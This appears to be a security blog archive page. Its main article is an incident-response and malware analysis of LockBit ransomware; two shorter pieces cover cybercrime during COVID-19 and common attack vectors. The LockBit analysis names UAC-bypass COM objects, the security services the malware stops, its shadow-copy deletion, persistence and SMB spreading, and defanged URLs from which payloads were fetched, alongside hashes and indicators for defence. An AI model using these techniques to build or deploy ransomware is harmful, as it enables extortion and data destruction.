Monthly Archives: April 2020

Tales From the Trenches; a Lockbit Ransomware Story

In collaboration with Northwave

As we highlighted previously across two blogs, targeted ransomware attacks have increased massively over the past months. In our first article, we discussed the growing pattern of targeted ransomware attacks where the primary infection stage is often an info-stealer kind of malware used to gain credentials/access to determine if the target would be valuable for a ransomware attack. In the second part, we described the reconnaissance phase of an attacker that controls an infected host or a valid account to access a remote service. Many of them are using a similar manual modus operandi as we highlighted in the earlier blogs.

We believe there is real opportunity to learn from incident response cases and previous attacks, hence why this blog is dubbed ‘tales from the trenches’. In collaboration with Northwave, this article describes a real-life case of a targeted ransomware attack. During one of their recent incident responses, Northwave encountered a relatively new family of ransomware called LockBit performing a targeted attack. First sighted in late 2019, under the name .abcd virus, this piece of ransomware was more a revision than evolution when compared with earlier attacks. Like the previous posts in this blog series, we describe the different stages of the attack and recovery, including a thorough analysis of the ransomware and the attackers behind it.

In this blog we’ll cover:

LockBit Telemetry Map

We gathered telemetry through our McAfee Global Threat Intelligence GTI database on the different LockBit samples we analyzed in our research. The global spread is currently limited as this ransomware is relatively new and heavily targeted.

Figure 1: Telemetry map

Initial Access

As in all ransomware cases, the attacker has to gain initial access to the network somehow. In this particular case the attacker performed a brute force attack on a web server containing an outdated VPN service. Based on our research it took several days for the brute force to crack the password of the ‘Administrator’ account. With this account, belonging to the administrator group, the attacker immediately obtained the proverbial “keys to the kingdom” with all the necessary permissions to perform a successful attack. Unfortunately, this is not a unique case; external facing systems should always have multi-factor authentication enabled when possible. Besides, a security organization should have a least privilege strategy when it comes to accessing systems. Targeted ransomware attackers are successfully leveraging the “human factor” integrally. It is no longer the typical “end-user clicking on a malicious link” causing the complete lock-up of a company. The human factor in targeted ransomware attacks goes much deeper. Attackers successfully leverage weaknesses in security policy and misconfigurations across an entire organization; from end-user to Domain Administrator.

Infiltrating the Network

To infiltrate the network, the attacker had to take several steps to make sure the ransomware attack was successful. An attacker always wants to infect as many systems as possible to effectively halt the business process and urge the victim to pay the ransom.

Credentials & Privileges

As mentioned previously, the attacker was successful in guessing the password of the Administrator account using a brute force attack. With this, the attacker immediately had all the necessary privileges for deploying the ransomware successfully. In other cases, as we described in our second blog, the attacker often uses known post-exploitation frameworks, for privilege escalation, lateral movement and performing any additional actions on their objective. Since quite a few of these frameworks are readily available we often call this the “GitHubification” of attack tools. In this case however, the attacker could actually skip this step and continue with the network reconnaissance and deployment of the ransomware immediately, since a high privileged account was already compromised.

Lateral Movement

With the administrator-level account, the attacker used SMB to perform network reconnaissance, resulting in an overview of accessible hosts. Subsequently, the attacker used the internal Microsoft Remote Access Server (RAS) to access these systems using either the administrator or the LocalSystem account. The LocalSystem account is a built-in Windows account. It is the most authoritative account on a Windows local instance (more potent than any admin account). Using these accounts, the attacker owned these systems and could do anything they wanted, including turning off any end-point security products. Interestingly, both the lateral movement and the deployment of the ransomware was entirely automated.

Deployment of the Ransomware

This specific case was a classic hit and run. After gaining access to the initial system using the brute-forced administrator account, the attacker logged in and deployed the ransomware almost immediately. For the attacker, this was a relatively straightforward process since the ransomware spreads itself. The deployment of the ransomware on one single host remotely instructed the other hosts in the network to run the following PowerShell command:

Figure 2: PowerShell execution to download LockBit

This command retrieves a .png file from a website that has probably been compromised. There are two versions of the .png file, one for .NET version 4 and one for version 3.5. The PowerShell command checks which version it needs by getting the version number of the common language runtime that is running the current process. If this starts with ‘V4’, the .png for version 4 is downloaded; otherwise it downloads the .png for version 3.5 via the URLs below:

  • https://espet[.]se/images/rs35.png
  • https://espet[.]se/images/rs40.png

What is interesting in this case is that each distinct host downloads the ransomware itself. Hence, the attacker only needed access to one system with an account having enough privileges to automatically make all other hosts in the network download and execute it.

Malware Analysis

For our analysis, we will use the file found in our investigation, the details of which are:

  File name: rs35.png
SHA1 488e532e55100da68eaeee30ba342cc05810e296
SHA256 ca57455fd148754bf443a2c8b06dc2a295f014b071e3990dd99916250d21bc75
size 546.00 KB
PDB c:\users\user\work\code\dotnet\regedit-64\regedit-64\obj\release\rs35.pdb
guid 84e7065-65fe-4bae-a122-f967584e31db

Technical Analysis

The file we found in our investigation was a dropper renamed as a .png file. When first opening the .png files we were expecting a real image file, with perhaps some steganography inside, but what we saw instead was the header of a portable executable, so no steganography pictures this time. The PE was compiled in Microsoft Visual C# v7.0 / Basic .NET, .NET executable -> Microsoft.

Figure 3: Static analysis of LockBit

Entropy-wise it seems quite tidy too, not showing any stray sections or big spikes in the graph. This behavior indicates that the writer of the malware did not use obfuscation.

Figure 4: Entropy analysis

Figure 5: Portex visualization of LockBit

This file is a .NET launcher. Examining the Main() function in the code shows that an array containing a particularly long AES encrypted base64 string (in the variable named ‘exeBuffer’) carries the executable for the actual ransomware.

Figure 6: .NET launcher buffer

This encrypted string is decrypted using the key ENCRYPTION29942. The first 32 bytes of the long ExeBuffer string are used as the salt in the encryption scheme, where ENCRYPTION29942 is the passphrase.

Figure 7: Launcher calls & functions

Remarkably, the script checks for the existence of vbc.exe on its designated host. Usually, this binary is a digitally signed executable from Microsoft; however, in this case, the malware uses it for process hollowing.

By statically analyzing the file we can spot the usage of:

  • NtUnmapViewOfSection
    • LockBit uses this API in order to unmap the original code in execution
  • NtWriteVirtualMemory
    • The malware writes the base address of the injected image into the PEB via NtWriteVirtualMemory
  • VirtualAllocEx
    • To allocate the space before injecting the malicious code

The VBC utility is the visual basic compiler for Windows and LockBit uses it to compile and execute the code on the fly directly in execution. If the vbc utility does not exist on the system, the malware downloads the original vbc.exe file from the same malicious URL as seen before. After executing vbc.exe, the malware replaces the objects in memory with the code for deploying the ransomware (as deduced from the exeBuffer).

Figure 8: If VBC does not exist, the launcher will download it

Payload Analysis

Analysis of the exeBuffer shows several appealing elements. It starts with a UAC Bypass via {3E5FC7F9-9A51-4367-9063-A120244FBEC7} exploiting the ICMLuaUtil elevated COM Interface-Object[1], as seen in other ransomware families like Trickbot and MedusaLocker.

Subsequently, the script uses another variant of the UAC Bypass. The CLSID {D2E7041B-2927-42fb-8E9F-7CE93B6DC937} refers to the ColorDataProxy COM Object which is classified as the same Bypass method in hfiref0x’s UACME #43[2].

In order to be stealthier, LockBit ransomware loads its modules dynamically instead of having them hardcoded in the IAT and uses LoadLibraryA. This method is employed to avoid detection by static engines.

Figure 9. Name of the modules in the code

In execution, the malware accesses the Service Manager using the function “OpenSCManagerA” and saves the handle. It checks if it fails the last error with the “GetLastError” function, against the error ERROR_ACCESS_DENIED.

Figure 10. Access to the Service Manager

Upon access to the Service Manager, LockBit creates a thread to manage services, terminate processes and delete the shadow volumes plus the contents of the recycle bin.

In this thread the malware has the name of services that it will try to manage hardcoded to try to make them more obfuscated:

Figure 11. Hardcoded service names

The list of services LockBit tries to stop are:

  • DefWatch (Symantec Antivirus)
  • ccEvtMgr (Norton AntiVirus Event Manager)
  • ccSetMgr (Common Client Settings Manager Service of Symantec)
  • SavRoam (Symantec Antivirus)
  • sqlserv
  • sqlagent
  • sqladhlp
  • Culserver
  • RTVscan (Symantec Antivirus Program)
  • sqlbrowser
  • QBIDPService (QuickBooksby Intuit.)
  • QuickBoooks.FCS (QuickBooksby Intuit.)
  • QBCFMonitorService (QuickBooksby Intuit.)
  • sqlwriter
  • msmdsrv (Microsoft SQL Server Analysis or Microsoft SQL Server)
  • tomcat6 (Apache Tomcat)
  • zhundongfangyu (this belongs to the 360 security product from Qihoo company)
  • vmware-usbarbitator64
  • vmware-converter
  • dbsrv12 (Creates, modifies, and deletes SQL Anywhere services.)
  • dbeng8 (Sybase’s Adaptive Server Anywhere version 8 database program)
  • wrapper (Java Service?)

If one of these services is found by the malware querying the status of it, with the function “QueryServiceStatusEx”, LockBit will get all the depending modules when correct and safe and it will stop the service with the function “ControlService”.

Figure 12. Stopping target service

LockBit will prepare Unicode obfuscated strings that contain a command to delete the shadow volumes and disable the protections in the next boot of the system.

Figure 13. Prepare the commands to delete shadow volumes and disable protections on boot

The malware has these strings in the rdata section, as widely observed in all malware families, and in its own code as show in the previous screenshots. The malware uses both strings.

During its execution, LockBit will create a snapshot of the processes running in the system and will search to see if certain processes are part of this list with the function “OpenProcess” and, in case the process is present, it will finish it with the “TerminateProcess” function.

The list of processes that LockBit will check are:

wxServer wxServerView
sqlservr RAgui
supervise Culture
RTVScan DefWatch
sqlbrowser winword
qbupdate QBCFMonitorService
axlbridge QBIDPService
httpd fdlauncher
MsDtSrvr tomcat6
zhudongfangyu vmware-usbarbitator64
vmware-converter dbsrv12

This “process check function” is performed through a trick using the “PathRemoveExtensionA” function and removing the .exe extension from the list. Using this technique, the check process is more obfuscated.

Figure 14. Remove extension and check the process name

In our analysis, we saw how the ransomware dynamically uses the function “IsWow64Process” to check if the victim OS is running a x64 system and then uses the functions “Wow64DisableWow64FsRedirection” and “Wow64RevertWow64FsResdirection”. If the malware can access the functions, it will use the first to destroy all shadow volumes and the protections of the OS in the next boot and, later, will recover the redirection with the other function. In the case that it cannot get these functions, LockBit will delete the shadow volume directly through the function “ShellExecuteA” or with the function “CreateProcessA”.

Deletion of files within the recycle bin is executed with the function “SHEmptyRecycleBinW”.

Figure 15. Delete the contents of the recycle bin

Static analysis of the sample shows that LockBit will check the machine to see if it has support for  AES instructions in the processor with the “cpuid” opcode.

Figure 16. Check for AES instruction support in the CPU

Another check made by the ransomware is for the existence of the SS2 set of instructions:

Figure 17. Check for SSE2 instructions in the CPU

After finishing this process, the malware will try to delete itself with the next command using “ShellExecuteExW”:

Image 18. Auto-deletion of the malware

The Ransom Note

The ransom note is rather compact because the author hardcoded the content right in the code without using any obfuscation or encryption. The text file containing the ransom note is created in every directory after encryption and called Restore-My-Files.txt.

Figure 19: Content that is placed in Restore-My-Files.txt

Victim Information Stored in the Registry Key

LockBit in execution will create two keys in the infected system with the values full and public.

Those keys are created in the following hive HKEY_CURRENT_USER\SOFTWARE\LockBit. The data stored in these keys belongs to the infected victim in order to be able to identify them in the future.

Figure 20: LockBit registry keys

Lastly, after finishing the encryption, the desktop wallpaper is changed to a message for the user, saying that LockBit encrypted the host.

Figure 21: LockBit wallpaper after encryption

LockBit Filemarker

Some of the ransomware we analyzed shares a common file marker across all the encrypted files in order to verify the origin. This digital marker can be used there in the control panel in order to verify that this was the ransomware that encrypted the files.

This is an example for the first version of LockBit, where file marker was using:

C8 41 D0 BE AB 3F 0D 59 7B BF CF 40 C8 81 63 CD

If we compare two encrypted files, we can spot how the file marker matches in both encrypted files:

Figure 22: File marker used by LockBit

SMB Spreading

Analyzing LockBit in our environment, we identified the possibility to spread locally in the same local network. Analyzing the network traffic, we spotted the use of multiple ARP requests to find other hosts in the same network segment.

Figure 23: LockBit ARP traffic captured in the analysis

If these ARP requests finally find a host alive, LockBit will start a legitimate SMB connection to be able to deploy the ransomware in other machines.

Figure 24: LockBit SMB traffic captured in the analysis

If the SMB connection is successful, LockBit will execute the following PowerShell command to download the .NET launcher that will decompress and execute LockBit in a new system:

LockBit Ransomware Evolution:

LockBit is new on the scene, but we noticed the authors added several new features and improved the ransomware several times. That means there is an active group behind it which is probably getting feedback on its actions. This is an example of the development cycle; this graph was extracted, analyzing statically all the internal functions and comparing them across the samples:

For this investigation, we found different LockBit versions with different features between them:

LockBit Version 1

This first version contains unique features compared to other versions we found in the wild.

These features are:

  • IPLO (IPLogger geolocalization service)
  • Persistence through the COM interface and the HIVE Current Version Run
  • A different extension used in the encrypted files
  • Debug file created for debugging purposes
  • HIGH CPU Usage in the encryption process
  • The reusage of a MUTEX observed in other ransomware families

IPLO.RU geo-localization service:

One of the interesting items we found was that LockBit tries to identify the victim’s geo-location, through the URL IPLO.RU, requesting a static TXT file in that service.

Figure 25: LockBit IPLO.RU geolocation traffic captured in the analysis

The communication to this page is through HTTPS; we intercepted the traffic to get the reply from the remote server:

Figure 26: SSL decrypted traffic

Analyzing statically the code in LockBit, we found that this URL is not resolved dynamically in execution; it is hardcoded in the binary:

Figure 27: Hardcoded URL of IPLO service

Creating persistence through Current version Run and COM task schedule:

There are many ways to gain persistence in a system. This first version of LockBit uses a task schedule through the COM interface to gain persistence.

Figure 28: Persistence using the COM interface

LockBit also uses a reboot persistence method by using the Windows registry hive:


Using the CurrentVersion\Run hive serves to survive the reboot if the system shuts down.

LockBit is actually using two persistence methods, CLSID and CurrentVersion\Run

.abcd extension used:

The first version of LockBit uses the .abcd extension every time it encrypts a file; this is a unique difference between this version and the other versions found.

Ransom note used:

LockBit in this first version used a different ransom note with a different message:

Figure 29: LockBit ransomware note

Debug file created in execution:

LockBit’s first version has some files that are skipped in the encryption process and every time it skips one it will create resultlog6.reg with the log information:

Figure 30: Debug file created by LockBit

High CPU usage:

We analyzed the performance of the encryption and we noted how LockBit uses the CPU heavily in the encryption process:

Figure 31: LockBit performance in execution

PhobosImposter static MUTEX used:

In October 2019, the community saw how PhobosImposter was using the mutex XO1XADpO01 in its executions and the same mutex is used by LockBit in this first version. We analyzed the base code of both samples and we did not find any code overlap but is a quite a random string to use casually.

This is the function used to create the mutex:

Figure 32. Creation and check of the hardcoded mutex

LockBit Version 2

This LockBit version came out with the following changes:

  • Appended extension changed
  • The debug function removed
  • Some of the samples came packed wither with UPX or a Delphi packer
  • One sample digitally signed

Appended extension changed:

For this version, LockBit started to append the extension .lockbit in all the encrypted files as a file marker:

Debug log function removed:

LockBit, in this new version, removed the functionality whereby it stored all the skipped files in the encryption process.

Sample delivery with different protections:

In this version we found LockBit samples packed in UPX and other custom packers, adding certain protections to the samples:

  • Extensive usage of PEB during the execution
  • The use of IsDebuggerPresent, OutputDebugString and GetLastError

All these protections are enabled by the use of packers in the delivery.

Mutex change:

The prior version of LockBit used a static mutex in all the encryptions but, in this release, it changed to be a dynamic value for every infection.

Samples digitally signed:

For all the versions we found for LockBit, only this version had a sample digitally signed:

Figure 33: LockBit sample digitally signed

LockBit Version 3

Ransomware note changed:

For this version LockBit adapted the ransomware note and used a new one:

Figure 34: LockBit 2nd version of the ransomware note

LockBit debug enabled:

After all the hunting progress we made, we found several samples of LockBit with some kind of status feature enabled, showing a progress window during the encryption:

Figure 35: LockBit debug enabled

This mode was only available for certain sample compilations and the status screen was different depending on the LockBit sample analyzed:

Figure 36: LockBit sample digitally signed

Tales from the Underground

When we researched the underground community for LockBit we came across a posting on several popular underground forums.  A threat actor named Lockbi or LockBit is offering LockBit as a “bespoke” ransomware as a service for limited partners/affiliates. We suspect LockBit ransomware to be more “bespoke”, not only from its own announcements, but subsequently we have not seen any affiliate identifiers present in the ransomware, which is normally a clear sign of an actor trying to upscale operations and service a larger number of affiliates.

The advertisement provides a general description that matches the LockBit behavior we have seen in the wild and from our analysis. As many other cyber-criminal services, LockBit does not allow the use of the software in any of the CIS countries. This is commonly done to avoid prosecution if the threat actor resides in one of those nations.

What we also noticed was a mention around multi-threading. Ransomware families are often programmed to run multi-threaded to ensure quick and overall encryption and prevent the encryption process getting stuck on a large file. However, LockBit was specifically advertised as single threaded and the threat actor Lockbi ensures that there are no speed issues when it comes to its encryption capability.

Figure 37: The LockBit advertisement

In the advertisement it is listed that one of the features of the ransomware is a local subnet scanner and SMB propagation method, something we can confirm based on our analysis.

Also noteworthy is the use of a Jabber-bot to perform the essential functions, such as chatting, decryption and banning, replacing the need for a labor intensive admin panel that is hosted somewhere on the internet.

Figure 38: LockBit profile including the 10,5 BTC deposit

It seems that LockBit has joined the underground scene with a clear determination to do business; the authors have put a down a deposit in excess of 10,5 BTC, a bit shy of 75K USD. Putting a deposit in escrow is a way to demonstrate that the seller is invested financially and not out to scam potential partners. The seller would lose their deposit if they did not keep to their end of the deal. Our telemetry shows that LockBit activity is still limited today but we can definitely expect to see more bespoke LockBit attacks in the near future.


Going back to the real-life case, there were no recent offline backups. So, with the backup servers (including the backups) encrypted as well and a complete rebuild not being an option, there was no way for a successful and swift recovery other than by paying the ransom.

Both McAfee’s and Northwave’s perspective is that ransoms should not be paid. Paying does not only support the criminal business model, but as we have shown in our research, it also finances other forms of crime, such as the online drug trade.

In this specific case the victim chose to pay the ransom. The first step for recovery was to get in contact with the hacker following the instructions from the ransom note (Restore-my-files.txt) as depicted below.

Figure 39: LockBit ransomware note

Interestingly, as opposed to earlier known cases of LockBit (or .abcd virus) where contact with the attacker occurred via email addresses mentioned in the ransom note, in this case, the attacker developed an online ‘help desk’ accessible via a .onion address. Helpful as the hacker is, they even provided clear instructions on how to access this .onion address with the Tor browser. Although the ransom note claims there was private data obtained, Northwave did not find any evidence for this on the compromised systems.

Figure 40: LockBit recovery page

The image above shows the helpdesk which the attacker uses for communication with their victims. It provides the functionality for a trial in which two files can be decrypted ‘for warranty’, showing that the attacker indeed has the correct key(s) for restoring the data. For this, it is always essential to test files from different (critical) servers since keys might differ per server. In negotiations with an attacker, always try to obtain this knowledge since it is also relevant for your recovery strategy. If it is only one key, you know you can use one tool for the entire network; however, if encrypted servers use distinct keys, recovery becomes increasingly more difficult.

After successful decryption of two different files (from distinct servers), the chat with the attacker began. They started by asking for a network domain name (to identify the correct victim), then the attacker addressed the ransom amount. Usually, the attackers do proper research on their victims and tailor the ransom amount accordingly, which was the case here as well. Hence, negotiating on the amount of the ransom did not prove to be useful:

“We know who you are, so don’t play negotiate games.”

Trouble in Hacker Paradise

Subsequently, making the bitcoin transaction to the provided address, the helpdesk page would automatically update after six confirmations and show the download link for the decryptor.

“After 6 transaction confirmations, in a few hours decryptor will be built automatically. Don’t worry you will get it instantly once it’s built.”

Since there was nothing else to do than wait and hope for the decryptor now, an attempt was made into obtaining some more information from the attacker by asking about their methods. See a snippet of this conversation below.

Figure 41: Attacker communication

The ‘weak passwords’ is, of course, entirely in line with the brute force attack mentioned earlier. Additionally, this conversation indicates that there is a larger group behind this attack, where roles between different participants are separated. The helpdesk seems to be an actual helpdesk, merely following a script of actions.

After waiting for several hours and six confirmations further, the decryption tool should have been ready for download. However, this is where things progressed differently. There seemed to be some technical issues causing the decryptor not to generate automatically for which the helpdesk kindly apologized. Unfortunately, this continued for two dubious days with multiple excuses before the attacker sent a link to the decryptor via the chat. It appeared that they were ineffective in solving the technical issues; hence they chose to send it via SendSpace.

Once downloaded, the recovery phase could start. In this phase, all servers were decrypted, scanned and cleaned (or rebuilt) in a quarantined network. Subsequently, after implementing the appropriate technical and security measures, each host joined a new clean network.


As we highlighted in the first two articles, targeted ransomware attacks have increased massively over the past months. Many of them are all using a similar, quite manual, attack pattern as we highlighted. In this article, we provided an in-depth view of a relatively new ransomware family named LockBit. Based on a real-life case as encountered by Northwave, we described a typical ransomware attack including the modus operandi of attackers, the recovery process, an insight in the underground that advertises the ransomware and a full technical break-down of the ransomware itself. Additionally, during our analysis, we were able to obtain multiple samples of the LockBit ransomware with which we could provide an extensive list of IOCs. McAfee will continue monitoring this threat.

Learn from the articles, identify which technology can give you visibility inside your network. What digital evidence sources do you have, and can you detect fast enough to preserve and respond? If you were not able to prevent the ‘initial access stage’, make sure to have a strong Defense-in-Depth by having multiple defence technologies in place. In case a ransomware attack does strike your organization, have a proper backup procedure in place to successfully restore operations on your own? For additional ransomware prevention tips please visit

To learn more about how McAfee products can defend against these types of attacks, visit see our blog on how ENS 10.7 Rolls Back the Curtain on Ransomware.


Technique ID Technique Description
T1107 File Deletion
T1055 Process Injection
T1112 Modify Registry
T1215 Kernel Modules and Extensions
T1060 Registry Run Keys / Start Folder
T1179 Hooking
T1055 Process Injection
T1179 Hooking
T1124 System Time Discovery
T1046 Network Service Scanning
T1083 File and Directory Discovery
T1016 System Network Configuration Discovery
T1012 Query Registry
T1082 System Information Discovery
T1057 Process Discovery
T1063 Security Software Discovery
T1047 Windows Management Instrumentation
T1035 Service Execution
T1075 Pass the Hash


SHA256 Compile TimeStamp
ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d 1992:06:20
286bffaa9c81abfb938fe65be198770c38115cdec95865a241f913769e9bfd3f 2009:02:12
76a77def28acf51b2b7cdcbfaa182fe5726dd3f9e891682a4efc3226640b9c78 2009:02:12
faa3453ceb1bd4e5b0b10171eaa908e56e7275173178010fcc323fdea67a6869 2009:02:12
70cb1a8cb4259b72b704e81349c2ad5ac60cd1254a810ef68757f8c9409e3ea6 2019:11:29
ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d 2019:12:01
13849c0c923bfed5ab37224d59e2d12e3e72f97dc7f539136ae09484cbe8e5e0 2019:12:11
6fedf83e76d76c59c8ad0da4c5af28f23a12119779f793fd253231b5e3b00a1a 2019:12:17
c8205792fbc0a5efc6b8f0f2257514990bfaa987768c4839d413dd10721e8871 2019:12:18
15a7d528587ffc860f038bb5be5e90b79060fbba5948766d9f8aa46381ccde8a 2020:01:23
0f5d71496ab540c3395cfc024778a7ac5c6b5418f165cc753ea2b2befbd42d51 2020:01:23
0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f 2020:01:23
410c884d883ebe2172507b5eadd10bc8a2ae2564ba0d33b1e84e5f3c22bd3677 2020:02:12
e3f236e4aeb73f8f8f0caebe46f53abbb2f71fa4b266a34ab50e01933709e877 2020:02:16
0f178bc093b6b9d25924a85d9a7dde64592215599733e83e3bbc6df219564335 2020:02:16
1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18 2020:02:17
26b6a9fecfc9d4b4b2c2ff02885b257721687e6b820f72cf2e66c1cae2675739 2020:02:17
69d9dd7fdd88f33e2343fb391ba063a65fe5ffbe649da1c5083ec4a67c525997 2020:02:17
0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76 2020:02:17
1e3bf358c76f4030ffc4437d5fcd80c54bd91b361abb43a4fa6340e62d986770 2020:02:17
5072678821b490853eff0a97191f262c4e8404984dd8d5be1151fef437ca26db 2020:02:20
ca57455fd148754bf443a2c8b06dc2a295f014b071e3990dd99916250d21bc75 2020-02-20


The post Tales From the Trenches; a Lockbit Ransomware Story appeared first on McAfee Blogs.

How Cybercriminals are Weathering COVID-19

In many ways, the COVID-19 pandemic has been a boon to cybercriminals: With unprecedented numbers of people working from home and anxious for news about the virus outbreak, it’s hard to imagine a more target-rich environment for phishers, scammers and malware purveyors. In addition, many crooks are finding the outbreak has helped them better market their cybercriminal wares and services. But it’s not all good news: The Coronavirus also has driven up costs and disrupted key supply lines for many cybercriminals. Here’s a look at how they’re adjusting to these new realities.


One of the more common and perennial cybercriminal schemes is “reshipping fraud,” wherein crooks buy pricey consumer goods online using stolen credit card data and then enlist others to help them collect or resell the merchandise.

Most online retailers years ago stopped shipping to regions of the world most frequently associated with credit card fraud, including Eastern Europe, North Africa, and Russia. These restrictions have created a burgeoning underground market for reshipping scams, which rely on willing or unwitting residents in the United States and Europe — derisively referred to as “reshipping mules” — to receive and relay high-dollar stolen goods to crooks living in the embargoed areas.

A screen shot from a user account at “Snowden,” a long-running reshipping mule service.

But apparently a number of criminal reshipping services are reporting difficulties due to the increased wait time when calling FedEx or UPS (to divert carded goods that merchants end up shipping to the cardholder’s address instead of to the mule’s). In response, these operations are raising their prices and warning of longer shipping times, which in turn could hamper the activities of other actors who depend on those services.

That’s according to Intel 471, a cyber intelligence company that closely monitors hundreds of online crime forums. In a report published today, the company said since late March 2020 it has observed several crooks complaining about COVID-19 interfering with the daily activities of their various money mules (people hired to help launder the proceeds of cybercrime).

“One Russian-speaking actor running a fraud network complained about their subordinates (“money mules”) in Italy, Spain and other countries being unable to withdraw funds, since they currently were afraid to leave their homes,” Intel 471 observed. “Also some actors have reported that banks’ customer-support lines are being overloaded, making it difficult for fraudsters to call them for social-engineering activities (such as changing account ownership, raising withdrawal limits, etc).”

Still, every dark cloud has a silver lining: Intel 471 noted many cybercriminals appear optimistic that the impending global economic recession (and resultant unemployment) “will make it easier to recruit low-level accomplices such as money mules.”

Alex Holden, founder and CTO of Hold Security, agreed. He said while the Coronavirus has forced reshipping operators to make painful shifts in several parts of their business, the overall market for available mules has never looked brighter.

“Reshipping is way up right now, but there are some complications,” he said.

For example, reshipping scams have over the years become easier for both reshipping mule operators and the mules themselves. Many reshipping mules are understandably concerned about receiving stolen goods at their home and risking a visit from the local police. But increasingly, mules have been instructed to retrieve carded items from third-party locations.

“The mules don’t have to receive stolen goods directly at home anymore,” Holden said. “They can pick them up at Walgreens, Hotel lobbies, etc. There are a ton of reshipment tricks out there.”

But many of those tricks got broken with the emergence of COVID-19 and social distancing norms. In response, more mule recruiters are asking their hires to do things like reselling goods shipped to their homes on platforms like eBay and Amazon.

“Reshipping definitely has become more complicated,” Holden said. “Not every mule will run 10 times a day to the post office, and some will let the goods sit by the mailbox for days. But on the whole, mules are more compliant these days.”


KrebsOnSecurity recently came to a similar conclusion: Last month’s story, “Coronavirus Widens the Money Mule Pool,” looked at one money mule operation that had ensnared dozens of mules with phony job offers in a very short period of time. Incidentally, the fake charity behind that scheme — which promised to raise money for Coronavirus victims — has since closed up shop and apparently re-branded itself as the Tessaris Foundation.

Charitable cybercriminal endeavors were the subject of a report released this week by cyber intel firm Digital Shadows, which looked at various ways computer crooks are promoting themselves and their hacking services using COVID-19 themed discounts and giveaways.

Like many commercials on television these days, such offers obliquely or directly reference the economic hardships wrought by the virus outbreak as a way of connecting on an emotional level with potential customers.

“The illusion of philanthropy recedes further when you consider the benefits to the threat actors giving away goods and services,” the report notes. “These donors receive a massive boost to their reputation on the forum. In the future, they may be perceived as individuals willing to contribute to forum life, and the giveaways help establish a track record of credibility.”

Brian’s Club — one of the underground’s largest bazaars for selling stolen credit card data and one that has misappropriated this author’s likeness and name in its advertising — recently began offering “pandemic support” in the form of discounts for its most loyal customers.

It stands to reason that the virus outbreak might depress cybercriminal demand for “dumps,” or stolen account data that can be used to create physical counterfeit credit cards. After all, dumps are mainly used to buy high-priced items from electronics stores and other outlets that may not even be open now thanks to the widespread closures from the pandemic.

If that were the case, we’d also expect to see dumps prices fall significantly across the cybercrime economy. But so far, those price changes simply haven’t materialized, says Gemini Advisory, a New York based company that monitors the sale of stolen credit card data across dozens of stores in the cybercrime underground.

Stas Alforov, Gemini’s director of research and development, said there’s been no notable dramatic changes in pricing for both dumps and card data stolen from online merchants (a.k.a. “CVVs”) — even though many cybercrime groups appear to be massively shifting their operations toward targeting online merchants and their customers.

“Usually, the huge spikes upward or downward during a short period is reflected by a large addition of cheap records that drive the median price change,” Alforov said, referring to the small and temporary price deviations depicted in the graph above.

Intel 471 said it came to a similar conclusion.

“You might have thought carding activity, to include support aspects such as checker services, would decrease due to both the global lockdown and threat actors being infected with COVID-19,” the company said. “We’ve even seen some actors suggest as much across some shops, but the reality is there have been no observations of major changes.”


Interestingly, the Coronavirus appears to have prompted discussion on a topic that seldom comes up in cybercrime communities — i.e., the moral and ethical ramifications of their work. Specifically, there seems to be much talk these days about the potential karmic consequences of cashing in on the misery wrought by a global pandemic.

For example, Digital Shadows said some have started to question the morality of targeting healthcare providers, or collecting funds in the name of Coronavirus causes and then pocketing the money.

“One post on the gated Russian-language cybercriminal forum Korovka laid bare the question of threat actors’ moral obligation,” the company wrote. “A user initiated a thread to canvass opinion on the feasibility of faking a charitable cause and collecting donations. They added that while they recognized that such a plan was ‘cruel,’ they found themselves in an ‘extremely difficult financial situation.’ Responses to the proposal were mixed, with one forum user calling the plan ‘amoral,’ and another pointing out that cybercrime is inherently an immoral affair.”

What Are the Main Vectors of Attack in Cybersecurity and How Do They Work?

Today’s dangerous cyber landscape demands all businesses to position themselves ahead of cybercriminals in order to maintain their safety. This always starts with identifying your weaknesses, understanding how your company may become compromised, and implementing the most appropriate prevention and detections methods that will help you achieve cyber resilience. But first, you have to understand what vectors of attack you can encounter that may disrupt your business.

What are vectors of attack?

Vectors of attack (or threat vectors) refer to the pathway that cyber attackers take to infiltrate your organization. In essence, an attack vector is a process or route a malicious hacker uses to reach a target, or in other words, the measures the attacker takes to conduct an attack.

Typically, attack vectors are intentional threats (rather than unintentional), as they do require some planning and analysis.

Various entities may exploit these vectors of attack, ranging from upset former employees to malicious hackers, cyber espionage groups, competitors, and more. Regardless of the person or group involved, they may either want to disrupt your business or steal your technology, confidential information or extort money from your employees. In any event, they will do their utmost to successfully utilize attack vectors and gain access to your systems.

Attack vectors vs. Attack surface

Attack vectors are the methods cybercriminals use to gain unauthorized access to a system, while an attack surface refers to the total number of attack vectors used by an intruder to control or steal data from your network or endpoints.

Attack vector examples in cybersecurity

Below I will briefly discuss the most common examples of vectors of attack that can threaten your organization.

#1. Insider Threats

Insider threat is one of the most common attack vectors. Still, not all types of insider threats are malicious, as naïve employees can sometimes inadvertently expose internal data. However, ill-intentioned individuals working for a company may intentionally disclose confidential information or plant malware, being fueled by various motives and for their own personal gain.

The most recent insider threat statistics reveal alarming issues that need to be considered and addressed by all organizations. For example, insider threats have increased by 47% in the past two years and 70% of organizations are witnessing more frequent insider attacks.

#2. Phishing

Phishing is merely one of many hats that social engineering wears. It involves manipulation tactics adopted by a malicious individual whose ultimate purpose is to trick employees into clicking on suspicious links, opening malware-infected email attachments, or giving away their login credentials.

The most insidious subtype of phishing is spear phishing, where very specific employees are observed in great detail only to be targeted later on by cybercriminals. This phenomenon is also part of the rising threat of Business Email Compromise (BEC), a highly sophisticated practice that can devastate companies of all sizes.

#3. Business partners

Third-party organizations can also become major vectors of attack in cybersecurity.

Some of the biggest security incidents and data breaches have been caused by vendors. Supply chain attacks are a common way for attackers to target a vendor’s customers. This is the reason why organizations large and small together with their business partners must foster a culture where cybersecurity best practices are shared and mutual transparency is demonstrated.

#4. Weak or compromised login credentials

Should your employees’ authentication credentials be too weak or become comprised, they may turn out to be an attacker’s surefire way to gain unauthorized access to your IT systems.

Usernames and passwords are the most popular form of authentication that can easily be abused through phishing, data leaks, and credential-stealing malware, giving intruders free access to your workers’ accounts.

